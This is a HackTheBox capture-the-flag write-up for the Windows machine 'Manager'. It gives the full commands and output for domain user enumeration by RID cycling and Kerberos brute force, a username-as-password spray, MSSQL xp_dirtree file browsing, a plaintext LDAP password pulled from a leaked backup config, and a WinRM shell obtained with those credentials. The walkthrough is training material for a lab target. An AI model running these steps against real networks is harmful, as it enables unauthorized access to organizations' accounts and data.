Manager starts with a RID cycle or Kerberos brute force to find users on the domain, and then a password spray using each user’s username as their password. When the operator account hits, I’ll get access to the MSSQL database instance, and use the xp_dirtree feature to explore the file system. I’ll find a backup archive of the webserver, including an old config file with creds for a user. As that user, I’ll get access to the ADCS instance and exploit the ESC7 misconfiguration to get access as administrator.
Name | Manager Play on HackTheBox |
---|---|
Release Date | 21 Oct 2023 |
Retire Date | 16 Mar 2024 |
OS | Windows |
Base Points | Medium [30] |
Rated Difficulty | |
Radar Graph | |
00:21:37 | |
00:43:47 | |
Creator |
nmap
finds a bunch of open TCP ports:
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.236
Starting Nmap 7.80 ( https://nmap.org ) at 2024-03-12 19:24 EDT
Nmap scan report for 10.10.11.236
Host is up (0.10s latency).
Not shown: 65513 filtered ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49721/tcp open unknown
55791/tcp open unknown
56862/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 13.72 seconds
oxdf@hacky$ nmap -p 53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389 -sCV 10.10.11.236
Starting Nmap 7.80 ( https://nmap.org ) at 2024-03-12 19:32 EDT
Nmap scan report for 10.10.11.236
Host is up (0.098s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-13 06:32:57Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-03-13T06:35:57+00:00; +6h59m52s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-03-13T06:35:58+00:00; +6h59m51s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 15.00.2000.00
| ms-sql-ntlm-info:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-13T04:21:14
|_Not valid after: 2054-03-13T04:21:14
|_ssl-date: 2024-03-13T06:35:57+00:00; +6h59m52s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-03-13T06:35:57+00:00; +6h59m52s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-03-13T06:35:58+00:00; +6h59m51s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/12%Time=65F0E637%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m51s, deviation: 0s, median: 6h59m50s
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server
| number: 15.00.2000.00
| Product: Microsoft SQL Server
|_ TCP port: 1433
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-03-13T06:35:18
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 187.96 seconds
There’s a lot here!
manager.htb
(based on LDAP and MSSQL).Before checking the webserver, I’ll brute force subdomains of manager.htb
to see if any return something different with ffuf
:
oxdf@hacky$ ffuf -u http://10.10.11.236 -H "Host: FUZZ.manage.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.236
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.manage.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
________________________________________________
:: Progress: [19966/19966] :: Job [1/1] :: 420 req/sec :: Duration: [0:00:48] :: Errors: 0 ::
It doesn’t find anything. I’ll update my hosts
file:
10.10.11.236 manager.htb dc01.manager.htb
The site is for a content writing service:
There is a contact form, but submitting it sends a GET request to /contact.html
without any of the data from the form.
The pages on the site are all .html
files, which indicates a static site.
The HTTP response headers shows IIS and not much more:
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 27 Jul 2023 16:02:39 GMT
Accept-Ranges: bytes
ETag: "1c67a5c4a3c0d91:0"
Server: Microsoft-IIS/10.0
Date: Wed, 13 Mar 2024 07:03:59 GMT
Connection: close
Content-Length: 18203
The 404 page is the standard IIS 404:
Seems like static site running on IIS.
I’ll run feroxbuster
against the site using a lowercase wordlist with Windows IIS:
oxdf@hacky$ feroxbuster -u http://10.10.11.236 -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.11.236
🚀 Threads │ 50
📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 2l 10w 146c http://10.10.11.236/js => http://10.10.11.236/js/
301 GET 2l 10w 150c http://10.10.11.236/images => http://10.10.11.236/images/
301 GET 2l 10w 147c http://10.10.11.236/css => http://10.10.11.236/css/
200 GET 507l 1356w 18203c http://10.10.11.236/
400 GET 6l 26w 324c http://10.10.11.236/error%1F_log
400 GET 6l 26w 324c http://10.10.11.236/css/error%1F_log
400 GET 6l 26w 324c http://10.10.11.236/images/error%1F_log
400 GET 6l 26w 324c http://10.10.11.236/js/error%1F_log
[####################] - 56s 106336/106336 0s found:8 errors:0
[####################] - 55s 26584/26584 476/s http://10.10.11.236/
[####################] - 55s 26584/26584 480/s http://10.10.11.236/js/
[####################] - 55s 26584/26584 480/s http://10.10.11.236/images/
[####################] - 55s 26584/26584 481/s http://10.10.11.236/css/
Nothing interesting.
netexec
shows the same domain and hostname:
oxdf@hacky$ netexec smb 10.10.11.236
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
I can’t enumerate shares with no user, and a bad user does seen to get some auth, but then can’t list shares either:
oxdf@hacky$ netexec smb 10.10.11.236 --shares
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [-] Error getting user: list index out of range
SMB 10.10.11.236 445 DC01 [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
oxdf@hacky$ netexec smb 10.10.11.236 --shares -u 0xdf -p 0xdf
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\0xdf:0xdf
SMB 10.10.11.236 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
Given that some kind of null auth is allowed here, I can try a RID cycling attack, by bruteforcing Windows user security identifiers (SIDs) by incrementing the relative identifier (RID) part. The Impacket script loopupside.py
will do this nicely:
oxdf@hacky$ lookupsid.py 0xdf@manager.htb -no-pass
Impacket v0.10.1.dev1+20230608.100331.efc6a1c3 - Copyright 2022 Fortra
[*] Brute forcing SIDs at manager.htb
[*] StringBinding ncacn_np:manager.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: MANAGER\Administrator (SidTypeUser)
501: MANAGER\Guest (SidTypeUser)
502: MANAGER\krbtgt (SidTypeUser)
512: MANAGER\Domain Admins (SidTypeGroup)
513: MANAGER\Domain Users (SidTypeGroup)
514: MANAGER\Domain Guests (SidTypeGroup)
515: MANAGER\Domain Computers (SidTypeGroup)
516: MANAGER\Domain Controllers (SidTypeGroup)
517: MANAGER\Cert Publishers (SidTypeAlias)
518: MANAGER\Schema Admins (SidTypeGroup)
519: MANAGER\Enterprise Admins (SidTypeGroup)
520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
525: MANAGER\Protected Users (SidTypeGroup)
526: MANAGER\Key Admins (SidTypeGroup)
527: MANAGER\Enterprise Key Admins (SidTypeGroup)
553: MANAGER\RAS and IAS Servers (SidTypeAlias)
571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
1000: MANAGER\DC01$ (SidTypeUser)
1101: MANAGER\DnsAdmins (SidTypeAlias)
1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
1113: MANAGER\Zhong (SidTypeUser)
1114: MANAGER\Cheng (SidTypeUser)
1115: MANAGER\Ryan (SidTypeUser)
1116: MANAGER\Raven (SidTypeUser)
1117: MANAGER\JinWoo (SidTypeUser)
1118: MANAGER\ChinHae (SidTypeUser)
1119: MANAGER\Operator (SidTypeUser)
The number before the :
in the output is the RID. I’ll use some Bash foo to get a nice users
list:
oxdf@hacky$ lookupsid.py 0xdf@manager.htb -no-pass | grep SidTypeUser | cut -d' ' -f2 | cut -d'\' -f2 | tr '[:upper:]' '[:lower:]' | tee users
administrator
guest
krbtgt
dc01$
zhong
cheng
ryan
raven
jinwoo
chinhae
operator
I can also do this with netexec
, just need to use the guest account:
oxdf@hacky$ netexec smb 10.10.11.236 -u guest -p '' --rid-brute
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\guest:
SMB 10.10.11.236 445 DC01 498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 500: MANAGER\Administrator (SidTypeUser)
SMB 10.10.11.236 445 DC01 501: MANAGER\Guest (SidTypeUser)
SMB 10.10.11.236 445 DC01 502: MANAGER\krbtgt (SidTypeUser)
SMB 10.10.11.236 445 DC01 512: MANAGER\Domain Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 513: MANAGER\Domain Users (SidTypeGroup)
SMB 10.10.11.236 445 DC01 514: MANAGER\Domain Guests (SidTypeGroup)
SMB 10.10.11.236 445 DC01 515: MANAGER\Domain Computers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 516: MANAGER\Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 517: MANAGER\Cert Publishers (SidTypeAlias)
SMB 10.10.11.236 445 DC01 518: MANAGER\Schema Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.236 445 DC01 521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 525: MANAGER\Protected Users (SidTypeGroup)
SMB 10.10.11.236 445 DC01 526: MANAGER\Key Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.236 445 DC01 571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.236 445 DC01 572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1000: MANAGER\DC01$ (SidTypeUser)
SMB 10.10.11.236 445 DC01 1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.236 445 DC01 1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB 10.10.11.236 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB 10.10.11.236 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB 10.10.11.236 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB 10.10.11.236 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB 10.10.11.236 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB 10.10.11.236 445 DC01 1119: MANAGER\Operator (SidTypeUser)
I’ll use ldapsearch
to confirm the base domain name:
oxdf@hacky$ ldapsearch -H ldap://dc01.manager.htb -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=manager,DC=htb
namingcontexts: CN=Configuration,DC=manager,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=manager,DC=htb
namingcontexts: DC=DomainDnsZones,DC=manager,DC=htb
namingcontexts: DC=ForestDnsZones,DC=manager,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
When I try to query further, it says I need auth, which I don’t have:
oxdf@hacky$ ldapsearch -H ldap://dc01.manager.htb -x -b "DC=manager,DC=htb"
# extended LDIF
#
# LDAPv3
# base <DC=manager,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090CF4, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
An alternative way to find usernames is by bruteforcing Kerberos with something like kerbrute
:
oxdf@hacky$ kerbrute userenum /opt/SecLists/Usernames/cirt-default-usernames.txt --dc dc01.manager.htb -d manager.htb
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 03/12/24 - Ronnie Flathers @ropnop
2024/03/12 20:43:18 > Using KDC(s):
2024/03/12 20:43:18 > dc01.manager.htb:88
2024/03/12 20:43:19 > [+] VALID USERNAME: ADMINISTRATOR@manager.htb
2024/03/12 20:43:19 > [+] VALID USERNAME: Administrator@manager.htb
2024/03/12 20:43:20 > [+] VALID USERNAME: GUEST@manager.htb
2024/03/12 20:43:20 > [+] VALID USERNAME: Guest@manager.htb
2024/03/12 20:43:21 > [+] VALID USERNAME: OPERATOR@manager.htb
2024/03/12 20:43:21 > [+] VALID USERNAME: Operator@manager.htb
2024/03/12 20:43:23 > [+] VALID USERNAME: administrator@manager.htb
2024/03/12 20:43:24 > [+] VALID USERNAME: guest@manager.htb
2024/03/12 20:43:25 > [+] VALID USERNAME: operator@manager.htb
2024/03/12 20:43:26 > Done! Tested 828 usernames (9 valid) in 7.886 seconds
It finds three, administrator, guest, and operator. I can use some other wordlists and find a handful more, but the important one is operator.
I can do a quick check to see if any of the usernames I’ve collected use their username as their password. With netexec
, I’ll give the same list for -u
and -p
, and the --no-brute
flag, which means instead of tying each username with each password, it just tries the first username with the first password, the second with the second, and so on. I like the --continue-on-success
flag to check if there are more then one set of valid creds here:
oxdf@hacky$ netexec smb manager.htb -u users -p users --continue-on-success --no-brute
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:guest STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\krbtgt:krbtgt STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\dc01$:dc01$ STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\zhong:zhong STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\jinwoo:jinwoo STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\chinhae:chinhae STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [+] manager.htb\operator:operator
The operator account uses the password operator! It doesn’t work over WinRM, so no shell from here:
oxdf@hacky$ netexec winrm manager.htb -u operator -p operator
WINRM 10.10.11.236 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
WINRM 10.10.11.236 5985 DC01 [-] manager.htb\operator:operator
The shares on Management are the standard DC shares:
oxdf@hacky$ netexec smb manager.htb -u operator -p operator --shares
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\operator:operator
SMB 10.10.11.236 445 DC01 [*] Enumerated shares
SMB 10.10.11.236 445 DC01 Share Permissions Remark
SMB 10.10.11.236 445 DC01 ----- ----------- ------
SMB 10.10.11.236 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.236 445 DC01 C$ Default share
SMB 10.10.11.236 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.236 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.236 445 DC01 SYSVOL READ Logon server share
There’s nothing too interesting in these.
The operator account does have LDAP access:
oxdf@hacky$ netexec ldap manager.htb -u operator -p operator
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.236 389 DC01 [+] manager.htb\operator:operator
Running ldapsearch -H ldap://dc01.manager.htb -x -D 'operator@manager.htb' -w operator -b "DC=manager,DC=htb"
will dump a bunch of LDAP to the terminal. I’ll use ldapdomaindump
to get all the info in a more viewable way:
oxdf@hacky$ mkdir ldap
oxdf@hacky$ ldapdomaindump -u management.htb\\operator -p 'operator' 10.10.11.236 -o ldap/
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
oxdf@hacky$ ls ldap/
domain_computers_by_os.html domain_computers.html domain_groups.grep domain_groups.json domain_policy.html domain_trusts.grep domain_trusts.json domain_users.grep domain_users.json
domain_computers.grep domain_computers.json domain_groups.html domain_policy.grep domain_policy.json domain_trusts.html domain_users_by_group.html domain_users.html
The domain_users_by_group.html
file is a nice overview of the users to target:
Raven is a good target to get shell over WinRM. Nothing else seems interesting.
The creds work for the database as well:
oxdf@hacky$ netexec mssql manager.htb -u operator -p operator
MSSQL 10.10.11.236 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL 10.10.11.236 1433 DC01 [+] manager.htb\operator:operator
mssqlclient.py
will connect, using the -windows-auth
flag to say that it’s using the OS authentication, not creds within the DB:
oxdf@hacky$ mssqlclient.py -windows-auth manager.htb/operator:operator@manager.htb
Impacket v0.10.1.dev1+20230608.100331.efc6a1c3 - Copyright 2022 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (MANAGER\Operator guest@master)>
There are four DBs:
SQL (MANAGER\Operator guest@master)> select name from master..sysdatabases;
name
------
master
tempdb
model
msdb
All four are default MSSQL databases.
mssqlclient.py
has extra shortcut commands to do common attacker things on the DB:
SQL (MANAGER\Operator guest@master)> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
enum_db - enum databases
enum_links - enum linked servers
enum_impersonate - check logins that can be impersonate
enum_logins - enum login users
enum_users - enum current db users
enum_owner - enum db owner
exec_as_user {user} - impersonate with execute as user
exec_as_login {login} - impersonate with execute as login
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
xp_dirtree {path} - executes xp_dirtree on the path
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
use_link {link} - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)
! {cmd} - executes a local shell cmd
show_query - show query
mask_query - mask query
enum_db
will show the same thing I queried above:
SQL (MANAGER\Operator guest@master)> enum_db
name is_trustworthy_on
------ -----------------
master 0
tempdb 0
model 0
msdb 1
xp_cmdshell
is feature in MSSQL to run commands on the system. operator doesn’t have access, and can’t enable it:
SQL (MANAGER\Operator guest@master)> xp_cmdshell whoami
[-] ERROR(DC01\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL (MANAGER\Operator guest@master)> enable_xp_cmdshell
[-] ERROR(DC01\SQLEXPRESS): Line 105: User does not have permission to perform this action.
[-] ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(DC01\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
xp_dirtree
is another feature for listing files on the filesystem. It works:
SQL (MANAGER\Operator guest@master)> xp_dirtree C:\
subdirectory depth file
------------------------- ----- ----
$Recycle.Bin 1 0
Documents and Settings 1 0
inetpub 1 0
PerfLogs 1 0
Program Files 1 0
Program Files (x86) 1 0
ProgramData 1 0
Recovery 1 0
SQL2019 1 0
System Volume Information 1 0
Users 1 0
Windows 1 0
The only interesting directory in C:\Users
is Raven
, and it is unaccessible. In the web root, I’ll confirm that this is a static HTML site:
SQL (MANAGER\Operator guest@master)> xp_dirtree C:\inetpub\wwwroot
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
There’s also a backup zip!
I’ll grab the archive from the webserver:
oxdf@hacky$ wget http://manager.htb/website-backup-27-07-23-old.zip
--2024-03-13 08:58:58-- http://manager.htb/website-backup-27-07-23-old.zip
Resolving manager.htb (manager.htb)... 10.10.11.236
Connecting to manager.htb (manager.htb)|10.10.11.236|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1045328 (1021K) [application/x-zip-compressed]
Saving to: ‘website-backup-27-07-23-old.zip’
website-backup-27-07-2 100%[==========================>] 1021K 1.50MB/s in 0.7s
2024-03-13 08:58:59 (1.50 MB/s) - ‘website-backup-27-07-23-old.zip’ saved [1045328/1045328]
And extract it:
oxdf@hacky$ unzip website-backup-27-07-23-old.zip -d webbackup/
Archive: website-backup-27-07-23-old.zip
inflating: webbackup/.old-conf.xml
inflating: webbackup/about.html
inflating: webbackup/contact.html
inflating: webbackup/css/bootstrap.css
inflating: webbackup/css/responsive.css
inflating: webbackup/css/style.css
inflating: webbackup/css/style.css.map
inflating: webbackup/css/style.scss
inflating: webbackup/images/about-img.png
inflating: webbackup/images/body_bg.jpg
extracting: webbackup/images/call.png
extracting: webbackup/images/call-o.png
inflating: webbackup/images/client.jpg
inflating: webbackup/images/contact-img.jpg
extracting: webbackup/images/envelope.png
extracting: webbackup/images/envelope-o.png
inflating: webbackup/images/hero-bg.jpg
extracting: webbackup/images/location.png
extracting: webbackup/images/location-o.png
extracting: webbackup/images/logo.png
inflating: webbackup/images/menu.png
extracting: webbackup/images/next.png
extracting: webbackup/images/next-white.png
inflating: webbackup/images/offer-img.jpg
inflating: webbackup/images/prev.png
extracting: webbackup/images/prev-white.png
extracting: webbackup/images/quote.png
extracting: webbackup/images/s-1.png
extracting: webbackup/images/s-2.png
extracting: webbackup/images/s-3.png
extracting: webbackup/images/s-4.png
extracting: webbackup/images/search-icon.png
inflating: webbackup/index.html
inflating: webbackup/js/bootstrap.js
inflating: webbackup/js/jquery-3.4.1.min.js
inflating: webbackup/service.html
The first file, .old-conf.xml
is interesting. It has an LDAP configuration for the raven user including a password:
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>
The LDAP enumeration showed that raven is in the Remote Management Users group, which means they should be able to WinRM. netexec
confirms, and that this password works:
oxdf@hacky$ netexec winrm manager.htb -u raven -p 'R4v3nBe5tD3veloP3r!123'
WINRM 10.10.11.236 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
WINRM 10.10.11.236 5985 DC01 [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123 (Pwn3d!)
I’m able to connect and get a shell:
oxdf@hacky$ evil-winrm -i manager.htb -u raven -p 'R4v3nBe5tD3veloP3r!123'
Evil-WinRM shell v3.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents>
And grab user.txt
:
*Evil-WinRM* PS C:\Users\Raven\Desktop> type user.txt
6e6a6b72************************
raven’s home directory is otherwise completely empty:
*Evil-WinRM* PS C:\Users\Raven> ls -recurse .
Directory: C:\Users\Raven
Mode LastWriteTime Length Name
